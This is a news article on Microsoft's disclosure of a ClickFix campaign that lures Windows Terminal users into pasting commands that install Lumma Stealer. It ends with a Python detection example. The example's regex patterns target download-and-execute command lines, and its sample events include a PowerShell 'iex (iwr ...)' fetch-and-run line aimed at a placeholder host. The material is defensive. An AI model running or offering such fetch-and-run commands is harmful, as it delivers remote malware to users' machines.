Microsoft Exposes ClickFix Terminal Attack Chain
Microsoft disclosed on March 6 a sophisticated social engineering campaign that weaponizes the Windows Terminal application to distribute Lumma Stealer malware. The attack, designated as ClickFix, was actively observed throughout February 2026.
Unlike previous campaigns that relied on the Windows Run dialog, this variant specifically targets the terminal emulator program. Attackers trick users into executing malicious commands directly through the Windows Terminal interface.
Windows Terminal Users at Risk
The campaign affects Windows systems running the Windows Terminal application. All versions of Windows 10 and Windows 11 with the terminal emulator installed are potentially vulnerable to this social engineering technique.
Organizations and individual users who regularly use command-line interfaces face elevated risk. The attack doesn't exploit a software vulnerability but relies on user interaction to succeed.
ClickFix Attack Mechanics and Response
The ClickFix campaign instructs victims to open Windows Terminal and paste malicious commands that download and execute Lumma Stealer. This information-stealing malware targets credentials, cryptocurrency wallets, and browser data.
Microsoft recommends user education and endpoint protection to counter these attacks. Organizations should implement application control policies and monitor terminal usage for suspicious command execution patterns. The Microsoft Security Response Center continues tracking this threat activity.
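One way to monitor terminal usage for suspicious command execution, as an added example that is not taken from Microsoft's report: flag processes that descend from Windows Terminal and whose command line pairs a download indicator with an execution indicator. The event field names, the regex patterns and the sample events are assumptions constructed for illustration.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Assumption: shells hosted in Windows Terminal descend from WindowsTerminal.exe.
TERMINAL = "windowsterminal.exe"
# Heuristic patterns chosen for this example; they are not indicators from Microsoft.
DOWNLOAD = re.compile(
    r"\b(invoke-webrequest|iwr|curl|wget|downloadstring|downloadfile|bitsadmin)\b|https?://", re.I)
EXECUTE = re.compile(
    r"\b(invoke-expression|iex|mshta|rundll32|regsvr32)\b|\s-enc\w*", re.I)

# Constructed process-creation events (field names are hypothetical).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 4, "image": r"C:\Windows\explorer.exe", "command_line": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\WindowsApps\<package>\WindowsTerminal.exe",
     "command_line": "WindowsTerminal.exe"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe"},  # interactive shell tab
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell.exe -c "iex (iwr https://example.invalid/a)"'},
    {"pid": 500, "ppid": 300, "image": r"C:\Program Files\Git\cmd\git.exe",
     "command_line": "git.exe clone https://example.invalid/repo.git"},  # download only
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell.exe -c "iex (iwr https://example.invalid/a)"'},  # not under Terminal
]

def descends_from_terminal(event, by_pid, max_depth=8):
    """Walk the parent chain and report whether Windows Terminal is an ancestor."""
    seen = set()
    cur = by_pid.get(event["ppid"])
    while cur and cur["pid"] not in seen and len(seen) < max_depth:
        if basename(cur["image"]).lower() == TERMINAL:
            return True
        seen.add(cur["pid"])  # guards against loops caused by PID reuse
        cur = by_pid.get(cur["ppid"])
    return False

def find_suspicious(events):
    """Return PIDs that download and execute content underneath Windows Terminal."""
    by_pid = {e["pid"]: e for e in events}
    return [e["pid"] for e in events
            if DOWNLOAD.search(e["command_line"]) and EXECUTE.search(e["command_line"])
            and descends_from_terminal(e, by_pid)]

if __name__ == "__main__":
    print(find_suspicious(SAMPLE_EVENTS))
```

Commands pasted into an already-open shell run inside that process, so process-creation telemetry only shows the child processes they launch; PowerShell script block logging (event ID 4104) records the pasted command itself.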




